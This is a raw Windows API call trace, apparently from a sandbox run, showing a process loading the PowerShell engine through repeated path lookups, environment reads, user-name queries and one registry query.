	[0063.052] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0xae76c | out: lpFileInformation=0xae76c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa191445, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x8797820, ftLastAccessTime.dwHighDateTime=0x1d4d67f, ftLastWriteTime.dwLowDateTime=0x8797820, ftLastWriteTime.dwHighDateTime=0x1d4d67f, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0063.053] GetLastError () returned 0xcb
	[0063.053] SetErrorMode (uMode=0x1) returned 0x1
	[0063.053] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0xae2ec, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0063.053] GetLastError () returned 0xcb
	[0063.053] SetErrorMode (uMode=0x1) returned 0x1
	[0063.053] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0xae76c | out: lpFileInformation=0xae76c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa191445, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x8797820, ftLastAccessTime.dwHighDateTime=0x1d4d67f, ftLastWriteTime.dwLowDateTime=0x8797820, ftLastWriteTime.dwHighDateTime=0x1d4d67f, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0063.053] GetLastError () returned 0xcb
	[0063.053] SetErrorMode (uMode=0x1) returned 0x1
	[0063.053] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0xae300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0063.053] GetLastError () returned 0xcb
	[0063.053] GetFullPathNameW (in: lpFileName="C:\\Windows\\.", nBufferLength=0x105, lpBuffer=0xae29c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0063.053] GetLastError () returned 0xcb
	[0063.053] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xae2ec, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0063.053] GetLastError () returned 0xcb
	[0063.053] SetErrorMode (uMode=0x1) returned 0x1
	[0063.053] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0xae76c | out: lpFileInformation=0xae76c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfb15659b, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x3a13b080, ftLastAccessTime.dwHighDateTime=0x1d4d68e, ftLastWriteTime.dwLowDateTime=0x3a13b080, ftLastWriteTime.dwHighDateTime=0x1d4d68e, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0063.053] GetLastError () returned 0xcb
	[0063.053] SetErrorMode (uMode=0x1) returned 0x1
	[0063.053] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xae2ec, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0063.053] GetLastError () returned 0xcb
	[0063.053] SetErrorMode (uMode=0x1) returned 0x1
	[0063.053] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0xae76c | out: lpFileInformation=0xae76c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfb15659b, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x3a13b080, ftLastAccessTime.dwHighDateTime=0x1d4d68e, ftLastWriteTime.dwLowDateTime=0x3a13b080, ftLastWriteTime.dwHighDateTime=0x1d4d68e, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0063.053] GetLastError () returned 0xcb
	[0063.053] SetErrorMode (uMode=0x1) returned 0x1
	[0063.053] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xae300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0063.053] GetLastError () returned 0xcb
	[0063.053] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\.", nBufferLength=0x105, lpBuffer=0xae29c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0063.053] GetLastError () returned 0xcb
	[0063.068] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xae3bc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0063.068] GetLastError () returned 0xcb
	[0063.068] SetErrorMode (uMode=0x1) returned 0x1
	[0063.068] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x220dbd0 | out: lpFileInformation=0x220dbd0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfb15659b, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x3a13b080, ftLastAccessTime.dwHighDateTime=0x1d4d68e, ftLastWriteTime.dwLowDateTime=0x3a13b080, ftLastWriteTime.dwHighDateTime=0x1d4d68e, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0063.068] GetLastError () returned 0xcb
	[0063.068] SetErrorMode (uMode=0x1) returned 0x1
	[0063.069] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xae404, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0063.069] GetLastError () returned 0xcb
	[0063.069] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xae3b4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0063.069] GetLastError () returned 0xcb
	[0063.069] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xae3b4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0063.069] GetLastError () returned 0xcb
	[0063.069] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xae3b4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0063.069] GetLastError () returned 0xcb
	[0063.093] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x20d6a0, nSize=0xae958 | out: lpNameBuffer="ZGW5TDPU\\2XC7u663GxWc", nSize=0xae958) returned 0x1
	[0063.093] GetLastError () returned 0xcb
	[0063.093] GetUserNameW (in: lpBuffer=0x242ad0, pcbBuffer=0xae960 | out: lpBuffer="2XC7u663GxWc", pcbBuffer=0xae960) returned 1
	[0063.094] ReportEventW (hEventLog=0x4350004, wType=0x4, wCategory=0x4, dwEventID=0x190, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x222e7f0*="Available", lpRawData=0x222e6ac) returned 1
	[0063.094] GetLastError () returned 0x0
	[0063.095] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x242ad0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0063.095] GetLastError () returned 0xcb
	[0063.096] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x242ad0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0063.096] GetLastError () returned 0xcb
	[0063.101] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xae438, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0063.101] GetLastError () returned 0xcb
	[0063.101] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xae3e8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0063.101] GetLastError () returned 0xcb
	[0063.101] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xae3e8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0063.101] GetLastError () returned 0xcb
	[0063.104] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xae3dc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0063.104] GetLastError () returned 0xcb
	[0063.104] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xae38c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0063.104] GetLastError () returned 0xcb
	[0063.104] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xae38c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0063.104] GetLastError () returned 0xcb
	[0063.104] GetEnvironmentVariableW (in: lpName="HomeDrive", lpBuffer=0x242ad0, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0063.104] GetLastError () returned 0xcb
	[0063.104] GetEnvironmentVariableW (in: lpName="HomePath", lpBuffer=0x242ad0, nSize=0x80 | out: lpBuffer="\\Users\\2XC7u663GxWc") returned 0x13
	[0063.104] GetLastError () returned 0xcb
	[0063.104] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xae3dc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0063.104] GetLastError () returned 0xcb
	[0063.104] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xae38c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0063.104] GetLastError () returned 0xcb
	[0063.104] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xae38c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0063.104] GetLastError () returned 0xcb
	[0063.104] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xae3dc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0063.104] GetLastError () returned 0xcb
	[0063.105] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xae38c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0063.105] GetLastError () returned 0xcb
	[0063.105] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xae38c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0063.105] GetLastError () returned 0xcb
	[0063.105] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xae3dc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0063.105] GetLastError () returned 0xcb
	[0063.105] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xae38c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0063.105] GetLastError () returned 0xcb
	[0063.105] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xae38c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0063.105] GetLastError () returned 0xcb
	[0063.105] GetCurrentProcessId () returned 0x81c
	[0063.105] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xae3dc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0063.105] GetLastError () returned 0xcb
	[0063.105] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xae38c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0063.105] GetLastError () returned 0xcb
	[0063.105] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xae38c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0063.105] GetLastError () returned 0xcb
	[0063.105] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xae3c8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0063.105] GetLastError () returned 0xcb
	[0063.105] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xae378, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0063.105] GetLastError () returned 0xcb
	[0063.106] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xae378, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0063.106] GetLastError () returned 0xcb
	[0063.106] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xae3c8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0063.106] GetLastError () returned 0xcb
	[0063.106] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xae378, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0063.106] GetLastError () returned 0xcb
	[0063.106] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xae378, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0063.106] GetLastError () returned 0xcb
	[0063.106] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xae3dc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0063.106] GetLastError () returned 0xcb
	[0063.106] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xae38c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0063.106] GetLastError () returned 0xcb
	[0063.106] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xae38c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0063.106] GetLastError () returned 0xcb
	[0063.106] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xae8ec | out: phkResult=0xae8ec*=0x32c) returned 0x0
	[0063.106] RegQueryValueExW (in: hKey=0x32c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xae934, lpData=0x0, lpcbData=0xae930*=0x0 | out: lpType=0xae934*=0x1, lpData=0x0, lpcbData=0xae930*=0x56) returned 0x0
	[0063.107] RegQueryValueExW (in: hKey=0x32c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xae934, lpData=0x242ad0, lpcbData=0xae930*=0x56 | out: lpType=0xae934*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xae930*=0x56) returned 0x0
	[0063.107] RegCloseKey (hKey=0x32c) returned 0x0
	[0063.107] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xae3dc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0063.107] GetLastError () returned 0xcb
	[0063.107] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xae38c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0063.107] GetLastError () returned 0xcb
	[0063.107] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xae38c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0063.107] GetLastError () returned 0xcb
	[0063.108] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xae3c4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0063.108] GetLastError () returned 0xcb
	[0063.108] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xae374, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0063.108] GetLastError () returned 0xcb
	[0063.108] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xae374, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0063.108] GetLastError () returned 0xcb
	[0063.114] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x242ad0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0063.114] GetLastError () returned 0xcb
	[0063.115] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xada54, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0063.115] GetLastError () returned 0xcb
	[0063.115] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xada04, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0063.115] GetLastError () returned 0xcb
	[0063.115] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xada04, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0063.115] GetLastError () returned 0xcb
	[0063.115] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xada54, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0063.115] GetLastError () returned 0xcb
	[0063.115] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xada04, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0063.115] GetLastError () returned 0xcb
	[0063.115] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xada04, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0063.115] GetLastError () returned 0xcb
	[0063.115] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xada54, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0063.115] GetLastError () returned 0xcb
